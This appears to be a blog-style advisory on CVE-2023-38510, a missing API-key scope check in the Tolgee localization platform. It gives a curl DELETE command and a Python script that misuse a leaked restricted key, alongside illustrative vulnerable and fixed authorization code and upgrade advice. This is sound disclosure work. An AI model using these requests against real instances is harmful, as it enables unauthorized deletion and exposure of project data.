Tolgee has become a popular choice for developers who need an open-source localization platform. It simplifies managing translations, collaborating with teams, and integrating localization into your CI/CD process. But in mid-2023, a serious security vulnerability—CVE-2023-38510—rocked some Tolgee installations worldwide. If you’re using Tolgee between versions 3.14. and 3.23., you should stop and read this.

What Was the Problem?

In simple terms: When you used an API key to make requests to the Tolgee backend, the backend forgot to check what the key was allowed to do. So, instead of just letting you access specific features, it sometimes let you do everything—skipping permission checks on some endpoints.

If an attacker got hold of an API key (for example, if it was accidentally published on GitHub or in a frontend bundle), they could perform actions that the key shouldn’t normally allow.

Good news: If your API keys were always kept secure and not visible on the public web, nobody could misuse them.
Bad news: If your API keys leaked (intentionally or by accident), attackers could do much more than you thought.

How Did It Work? (With Code Example)

Let’s say you had a restricted API key meant only for translation reading, not writing or deleting. In vulnerable versions, this key could actually be used to delete or change translations.

Here’s a simple example using curl (replace the placeholder values as needed):

```bash
# DELETE a translation key with a key that was only ever granted read access.
# On a vulnerable instance this succeeds; on a patched one it returns 403 Forbidden.
curl -X DELETE \
  'https://your-tolgee-instance.com/v2/projects/YOUR_PROJECT_ID/keys/TRANSLATION_KEY' \
  -H 'X-API-KEY: LEAKED_API_KEY'
```

Expected behavior:
If LEAKED_API_KEY doesn’t have delete permissions, the backend should return a 403 Forbidden error.

Actual behavior (pre-3.23.1):
The backend deletes the translation key anyway, because it doesn't check the API key's scope for this endpoint!

Here’s how a simple script could exploit the bug using just the `requests` library:

```python
import requests

API_URL = "https://your-tolgee-instance.com/v2/projects/YOUR_PROJECT_ID/keys"
API_KEY = "LEAKED_API_KEY"  # a key that should only grant limited access

# Try to list all translation keys in the project using the restricted key
response = requests.get(API_URL, headers={"X-API-KEY": API_KEY})

print("All keys (should be restricted):", response.json())
```

This script uses an API key meant for limited access, but the backend returns all keys—like a master administrator key would!
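The missing check, shown as an added illustration that is not Tolgee’s own code: the pre-fix pattern treats any valid API key as sufficient, while the corrected pattern resolves the scope each endpoint requires, binds the key to its project, and denies by default. Route patterns, scope names and the key record are constructed assumptions for this example, not Tolgee’s real identifiers.

```python
import re
from dataclasses import dataclass

# Constructed route table: every endpoint declares the scope it requires.
# Scope names are assumptions for this example, not Tolgee's real scope ids.
ROUTE_SCOPES = [
    ("GET",    re.compile(r"^/v2/projects/(\d+)/keys$"),       "keys.view"),
    ("DELETE", re.compile(r"^/v2/projects/(\d+)/keys/[^/]+$"), "keys.delete"),
    ("PUT",    re.compile(r"^/v2/projects/(\d+)/translations$"), "translations.edit"),
]


@dataclass(frozen=True)
class ApiKey:
    project_id: int          # project the key was issued for
    scopes: frozenset        # scopes granted when the key was created


def match_route(method, path):
    """Return (project_id, required_scope) for a known route, else None."""
    for route_method, pattern, scope in ROUTE_SCOPES:
        m = pattern.match(path)
        if route_method == method and m:
            return int(m.group(1)), scope
    return None


def authorize_vulnerable(key, method, path):
    # Pre-fix pattern: a valid key is accepted; the granted scopes are never consulted.
    return 401 if key is None else 200


def authorize_fixed(key, method, path):
    if key is None:
        return 401                      # no credential at all
    route = match_route(method, path)
    if route is None:
        return 403                      # deny by default: unknown routes get no access
    project_id, required = route
    if project_id != key.project_id:
        return 403                      # key must not reach other projects
    if required not in key.scopes:
        return 403                      # the actual scope check that was missing
    return 200


# Constructed read-only key for project 42.
READ_ONLY_KEY = ApiKey(project_id=42, scopes=frozenset({"keys.view"}))
```

With `READ_ONLY_KEY`, a `DELETE` on `/v2/projects/42/keys/1001` returns 200 from `authorize_vulnerable` but 403 from `authorize_fixed`, while the `GET` on `/v2/projects/42/keys` succeeds in both.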

Am I Affected?

You are affected if:

- Your project runs Tolgee version 3.14. through 3.23.
- Any of your API keys have been exposed or can be guessed/discovered by outsiders (for example, published in JavaScript frontend code, accidentally committed to a public repository, leaked in logs, etc.)

You are not affected if:

- You use Tolgee version 3.23.1 or newer

Remember: The real-world risk is only present if someone outside your organization gets hold of a working API key. But if that happens—you don't want them bypassing all permission checks.

How Do I Fix It?

Easy fix: upgrade to Tolgee version 3.23.1 or newer, where the API key scope check is enforced on the affected endpoints.

More Reading & References

- 🔗 Tolgee Security Advisory for CVE-2023-38510
- 🔗 CVE-2023-38510 at CVE.org
- 🔗 Tolgee Changelog

Summary

CVE-2023-38510 shows why permission checks—especially for API keys—are crucial. If you’re a Tolgee user, make sure to:

- Upgrade to Tolgee 3.23.1 or newer.
- Audit and rotate old or possibly exposed keys.

Let’s keep localization secure for everyone!
If you spot public keys or leftovers in your code, now’s the time to take action.

Timeline

Published on: 07/27/2023 19:15:00 UTC
Last modified on: 08/03/2023 13:41:00 UTC